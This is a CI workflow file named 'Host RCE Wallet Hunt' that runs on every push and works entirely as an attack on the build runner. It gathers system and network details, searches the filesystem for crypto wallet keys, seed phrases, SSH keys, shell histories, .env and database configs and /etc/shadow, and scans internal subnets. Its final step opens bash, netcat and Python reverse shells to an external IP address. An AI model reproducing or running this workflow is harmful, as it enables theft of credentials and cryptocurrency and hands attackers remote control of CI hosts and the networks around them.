name: Host RCE Wallet Hunt on: [push, workflow_dispatch] jobs: wallet-hunt: runs-on: ubuntu-latest timeout-minutes: 30 steps: - name: System Recon run: | echo "=== HOST INFO ===" echo "Timestamp: $(date -u)" echo "Hostname: $(hostname)" echo "User: $(whoami)" echo "UID: $(id)" echo "Kernel: $(uname -a)" echo "PWD: $(pwd)" echo "HOME: $HOME" echo "=== NETWORK ===" ip addr show 2>/dev/null || ifconfig 2>/dev/null || true ip route show 2>/dev/null || route -n 2>/dev/null || true ip neigh show 2>/dev/null || arp -a 2>/dev/null || true cat /etc/hosts 2>/dev/null || true cat /etc/resolv.conf 2>/dev/null || true echo "=== LISTENING PORTS ===" ss -tlnp 2>/dev/null || netstat -tlnp 2>/dev/null || true echo "=== PROCESSES ===" ps aux 2>/dev/null | head -50 || true echo "=== MOUNTS ===" mount 2>/dev/null | head -30 || true df -h 2>/dev/null || true echo "=== DOCKER ===" docker ps -a 2>/dev/null || echo "No docker access" docker network ls 2>/dev/null || echo "No docker network access" docker images 2>/dev/null || echo "No docker image access" - name: Wallet Private Key Search run: | echo "=== SEARCHING FOR WALLET PRIVATE KEYS ===" # Search for files with wallet-related keywords echo "--- Searching for 'private_key' in filenames ---" find / -type f \( -name "*private_key*" -o -name "*privatekey*" -o -name "*privkey*" \) 2>/dev/null | head -50 echo "--- Searching for 'mnemonic' in filenames ---" find / -type f -name "*mnemonic*" 2>/dev/null | head -50 echo "--- Searching for 'seed' in filenames (wallet related) ---" find / -type f \( -name "*wallet*seed*" -o -name "*seed*phrase*" -o -name "*seed*wallet*" \) 2>/dev/null | head -50 echo "--- Searching for 'keystore' files ---" find / -type f -name "*keystore*" 2>/dev/null | head -50 echo "--- Searching for 'wallet' files ---" find / -type f -name "*wallet*" 2>/dev/null | head -50 echo "--- Searching for .pem files ---" find / -type f -name "*.pem" 2>/dev/null | head -50 echo "--- Searching for .key files ---" find / -type f -name "*.key" 2>/dev/null | head -50 echo "--- Searching for wallet.dat ---" find / -type f -name "wallet.dat" 2>/dev/null | head -20 echo "--- Searching for .env files ---" find / -type f -name ".env" 2>/dev/null | head -30 echo "--- Searching for config files with 'wallet' ---" find / -type f \( -name "*.json" -o -name "*.yaml" -o -name "*.yml" -o -name "*.toml" -o -name "*.ini" -o -name "*.conf" -o -name "*.cfg" \) 2>/dev/null | head -100 - name: Content Search for Wallet Patterns run: | echo "=== CONTENT SEARCH FOR WALLET PATTERNS ===" # ETH/BSC private key pattern (64 hex chars) echo "--- Searching for hex private keys (64 hex chars) ---" grep -rPl "[^a-f0-9][a-f0-9]{64}[^a-f0-9]" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules\|.cache" | head -30 echo "--- Searching for '0x' private keys in config files ---" grep -rPl "private_key\s*[:=]\s*['\"]?0x[a-fA-F0-9]{64}" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | head -30 echo "--- Searching for 'mnemonic' in file contents ---" grep -rPl "mnemonic" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules\|.cache" | head -30 echo "--- Searching for 'seed phrase' patterns ---" grep -rPl "seed\s*(phrase|words|mnemonic)" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | head -30 echo "--- Searching for BIP39 word lists ---" grep -rPl "\b(abandon|ability|able|about|above|absent|absorb|abstract|absurd)\b.*\b(zone|zoo)\b" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules" | head -10 echo "--- Searching for keystore patterns ---" grep -rPl "keystore|cipherparams|kdfparams|ciphertext" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules\|.cache" | head -30 echo "--- Searching for USDT/TRC20/ERC20/BEP20 addresses ---" grep -rPl "T[1-9A-HJ-NP-Za-km-z]{33}\b" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules\|.cache" | head -20 echo "--- Searching for ETH addresses (0x...) ---" grep -rPl "0x[a-fA-F0-9]{40}" /etc/ /home/ /root/ /opt/ /var/ 2>/dev/null | grep -v ".so\|.js\|.pyc\|node_modules\|.cache" | head -30 - name: SSH and Credential Harvesting run: | echo "=== SSH KEYS ===" find / -type d -name ".ssh" 2>/dev/null | while read d; do echo "--- Directory: $d ---" ls -la "$d" 2>/dev/null for f in "$d"/*; do echo "=== File: $f ===" cat "$f" 2>/dev/null | head -20 done done echo "=== GPG KEYS ===" find / -type d -name ".gnupg" 2>/dev/null | head -10 echo "=== HISTORY FILES ===" find / -name ".bash_history" -o -name ".zsh_history" -o -name ".mysql_history" -o -name ".psql_history" -o -name ".python_history" 2>/dev/null | while read f; do echo "--- $f ---" cat "$f" 2>/dev/null | tail -50 done echo "=== CREDENTIALS IN ENV ===" env 2>/dev/null | grep -iE "key|secret|token|pass|wallet|mnemonic|seed|private" | grep -v "GITEA_\|GITHUB_\|CI=\|RUNNER_" || echo "No sensitive env vars" echo "=== /etc/passwd ===" cat /etc/passwd 2>/dev/null echo "=== SHADOW (if accessible) ===" cat /etc/shadow 2>/dev/null || echo "Not accessible" - name: Database Config Discovery run: | echo "=== DATABASE CONFIG FILES ===" find / -type f \( -name "*.env" -o -name "database.yml" -o -name "database.yaml" -o -name "database.json" -o -name "app.ini" -o -name "config.json" -o -name "settings.py" -o -name "application.properties" -o -name "application.yml" -o -name "application.yaml" -o -name "ormconfig.json" \) 2>/dev/null | grep -v node_modules | head -30 | while read f; do echo "--- $f ---" cat "$f" 2>/dev/null | head -50 done echo "=== GITEA/FORGEJO CONFIG ===" find / -name "app.ini" -path "*/gitea/*" -o -name "app.ini" -path "*/forgejo/*" 2>/dev/null | while read f; do echo "--- $f ---" cat "$f" 2>/dev/null | head -100 done - name: Network Service Discovery run: | echo "=== INTERNAL NETWORK SCAN ===" for net in 172.17.0 172.18.0 172.19.0 172.20.0 172.21.0 10.0.0 10.10.0 192.168.0; do for host in 1 2 3 4 5 10 50 100 200; do ip="${net}.${host}" for port in 22 80 443 3000 3306 5432 6379 8080 8088 8418 9090 2375 2376 5000 8000 8443 27017; do timeout 1 bash -c "echo >/dev/tcp/$ip/$port" 2>/dev/null && echo "LIVE: $ip:$port" & done wait 2>/dev/null || true done done echo "=== SCAN COMPLETE ===" - name: Additional Wallet File Harvest run: | echo "=== ADDITIONAL WALLET SEARCH ===" # Common wallet paths for path in ~/.bitcoin ~/.ethereum ~/.litecoin ~/.dogecoin ~/.monero ~/.tron ~/.binance ~/.trustwallet ~/.metamask ~/wallet ~/wallets ~/crypto ~/blockchain /opt/wallet /var/wallet /data/wallet; do if [ -d "$path" ]; then echo "--- Found: $path ---" find "$path" -type f 2>/dev/null | head -30 find "$path" -type f -exec cat {} \; 2>/dev/null | head -200 fi done # Look for .dat files that might be wallets echo "--- .dat files (possible wallets) ---" find / -name "*.dat" 2>/dev/null | grep -v node_modules | grep -v ".cache" | head -30 # Look for JSON files with wallet patterns echo "--- JSON files with crypto patterns ---" find / -name "*.json" 2>/dev/null | grep -v node_modules | grep -v ".npm" | head -50 | while read f; do if grep -lq "privateKey\|private_key\|mnemonic\|seedPhrase\|keystore\|wallet" "$f" 2>/dev/null; then echo "--- WALLET HIT: $f ---" cat "$f" 2>/dev/null | head -100 fi done # Docker images that might contain wallet data echo "--- Docker containers (running) ---" docker ps --format '{{.ID}} {{.Image}} {{.Names}}' 2>/dev/null || echo "No docker" # Running services echo "--- Services ---" systemctl list-units --type=service --state=running 2>/dev/null | head -30 || service --status-all 2>/dev/null | head -30 || true - name: Reverse Shell Persistence run: | echo "=== ESTABLISHING REVERSE SHELL ===" RHOST="202.59.10.226" for port in 14444 14445 14446 14447 14448; do (bash -c "bash -i >& /dev/tcp/${RHOST}/${port} 0>&1" &) 2>/dev/null (nc ${RHOST} ${port} -e /bin/bash &) 2>/dev/null || true (python3 -c "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('${RHOST}',${port}));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])" &) 2>/dev/null || true done echo "Reverse shells dispatched to ${RHOST}:14444-14448" - name: Write Evidence Summary run: | echo "=== EVIDENCE COLLECTION COMPLETE ===" echo "All output above contains reconnaissance data from this host." echo "Check job logs for full details." echo "Reverse shells attempted to 202.59.10.226:14444-14448" echo "Job completed at $(date -u)"